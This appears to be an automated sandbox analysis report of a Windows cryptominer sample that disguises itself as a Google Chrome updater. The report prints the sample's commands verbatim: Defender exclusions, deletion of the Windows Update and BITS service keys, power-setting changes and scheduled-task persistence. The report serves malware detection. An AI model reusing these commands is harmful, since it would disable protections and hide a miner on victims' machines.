Analysis
-
max time kernel
150s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
22-02-2023 15:04
Static task
static1
Behavioral task
behavioral1
Sample
dmi1dfg7n.exe
Resource
win7-20230220-en
General
-
Target
dmi1dfg7n.exe
-
Size
2.8MB
-
MD5
9253ed091d81e076a3037e12af3dc871
-
SHA1
ec02829a25b3bf57ad061bbe54180d0c99c76981
-
SHA256
78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
-
SHA512
29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
SSDEEP
49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
XMRig Miner payload 13 IoCs
Processes:
resource yara_rule behavioral1/memory/564-110-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/564-116-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/564-118-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/564-120-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/564-122-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/564-124-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/564-126-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/564-128-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/564-130-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/564-132-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/564-134-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/564-136-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/564-138-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 1424 updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 904 taskeng.exe -
Processes:
resource yara_rule behavioral1/memory/564-110-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/564-116-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/564-118-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/564-120-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/564-122-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/564-124-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/564-126-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/564-128-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/564-130-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/564-132-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/564-134-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/564-136-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/564-138-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
dmi1dfg7n.exeupdater.exedescription pid process target process PID 2012 set thread context of 1476 2012 dmi1dfg7n.exe dialer.exe PID 1424 set thread context of 1188 1424 updater.exe dialer.exe PID 1424 set thread context of 564 1424 updater.exe dialer.exe -
Drops file in Program Files directory 4 IoCs
Processes:
dmi1dfg7n.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe dmi1dfg7n.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Drops file in Windows directory 4 IoCs
Processes:
dialer.exedescription ioc process File opened for modification C:\Windows\Tasks\dialersvc32.job dialer.exe File created C:\Windows\Tasks\dialersvc64.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc64.job dialer.exe File created C:\Windows\Tasks\dialersvc32.job dialer.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1904 sc.exe 1244 sc.exe 548 sc.exe 1936 sc.exe 1176 sc.exe 1384 sc.exe 1112 sc.exe 1448 sc.exe 616 sc.exe 856 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b07d2f63d746d901 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedialer.exepid process 1984 powershell.exe 572 powershell.exe 1928 powershell.exe 1488 powershell.exe 844 powershell.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe 564 dialer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes:
powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exeupdater.exeWMIC.exedialer.exedescription pid process Token: SeDebugPrivilege 1984 powershell.exe Token: SeShutdownPrivilege 1936 powercfg.exe Token: SeDebugPrivilege 572 powershell.exe Token: SeShutdownPrivilege 944 powercfg.exe Token: SeShutdownPrivilege 1112 powercfg.exe Token: SeShutdownPrivilege 1548 powercfg.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeShutdownPrivilege 1996 powercfg.exe Token: SeShutdownPrivilege 1748 powercfg.exe Token: SeDebugPrivilege 844 powershell.exe Token: SeShutdownPrivilege 1204 powercfg.exe Token: SeShutdownPrivilege 1360 powercfg.exe Token: SeDebugPrivilege 1424 updater.exe Token: SeAssignPrimaryTokenPrivilege 472 WMIC.exe Token: SeIncreaseQuotaPrivilege 472 WMIC.exe Token: SeSecurityPrivilege 472 WMIC.exe Token: SeTakeOwnershipPrivilege 472 WMIC.exe Token: SeLoadDriverPrivilege 472 WMIC.exe Token: SeSystemtimePrivilege 472 WMIC.exe Token: SeBackupPrivilege 472 WMIC.exe Token: SeRestorePrivilege 472 WMIC.exe Token: SeShutdownPrivilege 472 WMIC.exe Token: SeSystemEnvironmentPrivilege 472 WMIC.exe Token: SeUndockPrivilege 472 WMIC.exe Token: SeManageVolumePrivilege 472 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 472 WMIC.exe Token: SeIncreaseQuotaPrivilege 472 WMIC.exe Token: SeSecurityPrivilege 472 WMIC.exe Token: SeTakeOwnershipPrivilege 472 WMIC.exe Token: SeLoadDriverPrivilege 472 WMIC.exe Token: SeSystemtimePrivilege 472 WMIC.exe Token: SeBackupPrivilege 472 WMIC.exe Token: SeRestorePrivilege 472 WMIC.exe Token: SeShutdownPrivilege 472 WMIC.exe Token: SeSystemEnvironmentPrivilege 472 WMIC.exe Token: SeUndockPrivilege 472 WMIC.exe Token: SeManageVolumePrivilege 472 WMIC.exe Token: SeLockMemoryPrivilege 564 dialer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
dmi1dfg7n.execmd.execmd.exepowershell.exedescription pid process target process PID 2012 wrote to memory of 1984 2012 dmi1dfg7n.exe powershell.exe PID 2012 wrote to memory of 1984 2012 dmi1dfg7n.exe powershell.exe PID 2012 wrote to memory of 1984 2012 dmi1dfg7n.exe powershell.exe PID 2012 wrote to memory of 472 2012 dmi1dfg7n.exe cmd.exe PID 2012 wrote to memory of 472 2012 dmi1dfg7n.exe cmd.exe PID 2012 wrote to memory of 472 2012 dmi1dfg7n.exe cmd.exe PID 2012 wrote to memory of 968 2012 dmi1dfg7n.exe cmd.exe PID 2012 wrote to memory of 968 2012 dmi1dfg7n.exe cmd.exe PID 2012 wrote to memory of 968 2012 dmi1dfg7n.exe cmd.exe PID 2012 wrote to memory of 572 2012 dmi1dfg7n.exe powershell.exe PID 2012 wrote to memory of 572 2012 dmi1dfg7n.exe powershell.exe PID 2012 wrote to memory of 572 2012 dmi1dfg7n.exe powershell.exe PID 472 wrote to memory of 1904 472 cmd.exe sc.exe PID 472 wrote to memory of 1904 472 cmd.exe sc.exe PID 472 wrote to memory of 1904 472 cmd.exe sc.exe PID 968 wrote to memory of 1936 968 cmd.exe powercfg.exe PID 968 wrote to memory of 1936 968 cmd.exe powercfg.exe PID 968 wrote to memory of 1936 968 cmd.exe powercfg.exe PID 472 wrote to memory of 1176 472 cmd.exe sc.exe PID 472 wrote to memory of 1176 472 cmd.exe sc.exe PID 472 wrote to memory of 1176 472 cmd.exe sc.exe PID 472 wrote to memory of 1244 472 cmd.exe sc.exe PID 472 wrote to memory of 1244 472 cmd.exe sc.exe PID 472 wrote to memory of 1244 472 cmd.exe sc.exe PID 968 wrote to memory of 944 968 cmd.exe powercfg.exe PID 968 wrote to memory of 944 968 cmd.exe powercfg.exe PID 968 wrote to memory of 944 968 cmd.exe powercfg.exe PID 968 wrote to memory of 1112 968 cmd.exe powercfg.exe PID 968 wrote to memory of 1112 968 cmd.exe powercfg.exe PID 968 wrote to memory of 1112 968 cmd.exe powercfg.exe PID 472 wrote to memory of 548 472 cmd.exe sc.exe PID 472 wrote to memory of 548 472 cmd.exe sc.exe PID 472 wrote to memory of 548 472 cmd.exe sc.exe PID 968 wrote to memory of 1548 968 cmd.exe powercfg.exe PID 968 wrote to memory of 1548 968 cmd.exe powercfg.exe PID 968 wrote to memory of 1548 968 cmd.exe powercfg.exe PID 472 wrote to memory of 1384 472 cmd.exe sc.exe PID 472 wrote to memory of 1384 472 cmd.exe sc.exe PID 472 wrote to memory of 1384 472 cmd.exe sc.exe PID 472 wrote to memory of 1640 472 cmd.exe reg.exe PID 472 wrote to memory of 1640 472 cmd.exe reg.exe PID 472 wrote to memory of 1640 472 cmd.exe reg.exe PID 472 wrote to memory of 1868 472 cmd.exe reg.exe PID 472 wrote to memory of 1868 472 cmd.exe reg.exe PID 472 wrote to memory of 1868 472 cmd.exe reg.exe PID 472 wrote to memory of 932 472 cmd.exe reg.exe PID 472 wrote to memory of 932 472 cmd.exe reg.exe PID 472 wrote to memory of 932 472 cmd.exe reg.exe PID 572 wrote to memory of 760 572 powershell.exe schtasks.exe PID 572 wrote to memory of 760 572 powershell.exe schtasks.exe PID 572 wrote to memory of 760 572 powershell.exe schtasks.exe PID 472 wrote to memory of 1692 472 cmd.exe reg.exe PID 472 wrote to memory of 1692 472 cmd.exe reg.exe PID 472 wrote to memory of 1692 472 cmd.exe reg.exe PID 472 wrote to memory of 1644 472 cmd.exe reg.exe PID 472 wrote to memory of 1644 472 cmd.exe reg.exe PID 472 wrote to memory of 1644 472 cmd.exe reg.exe PID 2012 wrote to memory of 1476 2012 dmi1dfg7n.exe dialer.exe PID 2012 wrote to memory of 1476 2012 dmi1dfg7n.exe dialer.exe PID 2012 wrote to memory of 1476 2012 dmi1dfg7n.exe dialer.exe PID 2012 wrote to memory of 1476 2012 dmi1dfg7n.exe dialer.exe PID 2012 wrote to memory of 1928 2012 dmi1dfg7n.exe powershell.exe PID 2012 wrote to memory of 1928 2012 dmi1dfg7n.exe powershell.exe PID 2012 wrote to memory of 1928 2012 dmi1dfg7n.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"1⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {22AEDB25-F51A-4B98-98B1-939073AE8309} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe xtrjicqmdliu3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor5⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
C:\Program Files\Google\Libs\g.logFilesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5c51a9e4a5121bd3e9fea8644c4aaa465
SHA1c1b8a00f8108df2e99c857a3b5bc5023b0731771
SHA256a6e9e6c135d036bb261b8bb3c78bf0f1866307fc3ac6e2abdb93e5f811737df4
SHA512b83a9bd96e4db510ddde3b103f00c5e71f448a6a24c6cacca9863dd860bc24b763098c79a78ffd39561ed70f67a4ee00318ef8e00cb66e882392fa902ec2af89
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5c51a9e4a5121bd3e9fea8644c4aaa465
SHA1c1b8a00f8108df2e99c857a3b5bc5023b0731771
SHA256a6e9e6c135d036bb261b8bb3c78bf0f1866307fc3ac6e2abdb93e5f811737df4
SHA512b83a9bd96e4db510ddde3b103f00c5e71f448a6a24c6cacca9863dd860bc24b763098c79a78ffd39561ed70f67a4ee00318ef8e00cb66e882392fa902ec2af89
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FED2BGVD6GEOF40WA3U0.tempFilesize
7KB
MD5c51a9e4a5121bd3e9fea8644c4aaa465
SHA1c1b8a00f8108df2e99c857a3b5bc5023b0731771
SHA256a6e9e6c135d036bb261b8bb3c78bf0f1866307fc3ac6e2abdb93e5f811737df4
SHA512b83a9bd96e4db510ddde3b103f00c5e71f448a6a24c6cacca9863dd860bc24b763098c79a78ffd39561ed70f67a4ee00318ef8e00cb66e882392fa902ec2af89
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
memory/564-118-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/564-122-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/564-138-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/564-111-0x00000000003F0000-0x0000000000410000-memory.dmpFilesize
128KB
-
memory/564-110-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/564-109-0x0000000000370000-0x0000000000390000-memory.dmpFilesize
128KB
-
